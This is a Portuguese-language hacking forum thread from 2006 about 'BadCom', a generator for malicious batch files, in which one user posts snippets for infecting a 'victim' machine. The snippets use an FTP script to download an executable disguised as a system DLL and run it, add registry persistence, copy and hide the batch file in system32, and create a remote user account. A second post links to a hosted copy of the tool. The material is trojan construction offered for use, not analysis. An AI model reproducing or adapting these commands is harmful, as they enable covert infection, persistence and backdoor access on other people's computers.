[Source] BadCom Generator 1.0 - by Sthealt

Started by Anonymous, 28 de May , 2006, 08:52:22 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Mental_Way

Pessoal muito bom e interessante esse trabalho de badcons porém aproveitando queria sugerir algumas variaveis que vcs poderiam colocar em uma versão atualilizada....

-------------------------------------------------------------------------------------------------------------------------------------------
1° Como baixar um arquivo de um servidor ftp e executa-lo na vitima através de um badcom:

@echo off
echo User > C:\datos.txt     //Aqui será inserido o usuário de ftp
echo Senha >> C:\datos.txt    //Aqui será inserida sua senha do ftp
echo put C:\datos.txt datos.txt >> C:\datos.txt
echo binary >> C:\datos.txt
echo get arquivo.exe c:\windows\system32\windowsdll.exe >> C:\datos.txt //nome do arquivo a ser baixado e onde ele se encontrará depois de ser baixado...
echo delete datos.txt >> C:\datos.txt
echo bye >> C:\datos.txt
ftp -s:C:\datos.txt \trojan\arquivo.exe //Diretorio_onde_se_encoontra_o_arquivo
del /s /q C:\datos.txt //deleterá o arquivo de entrata do ftp
start c:\windows\system32\windowsdll.exe // Executará o arquivo

-------------------------------------------------------------------------------------------------------------------------------------------
2 Adicionar wor ao registro:

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v windowsdll.exe /d %0
//Onde windowsdll.exe é o nome que será adiocionada podendo ser bat... de preferência adicione várias chaves para que naum haja duvida

3 Copiar e ocultar-se:

Copy /y %0, "C:\Windows\System32\Win.bat" // local e nome em que ele terá ao se ocultar-se
attrib +H +S C:\Windows\System32\Win.bat // Oculta-lo
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v Win32.dll /d "C:\Windows\System32\Win.bat" //Registro como visto acima

4 Adicionar usuário:

net user Usuario_remoto Senha_remota /add ///simplês

Acho que é só issu que me lembro de cabeça mais se pode fazer muita coisa com uma simplês badcon....

Se estiver algum erro por favor me alertem me lembro somente disso e fiz de cabeça....

Sem +...

By Mental_Way...
[RitualistaS GrouP]

"Aquele que sabe pouco rapidamente revela isto."

Fvox

Muito bom stealth..

Hospedei ele na net..
http://badcom.atspace.com/

quem quiser ta ai o link ! :D
"Achas que estás caindo na insanidade? Mergulhe."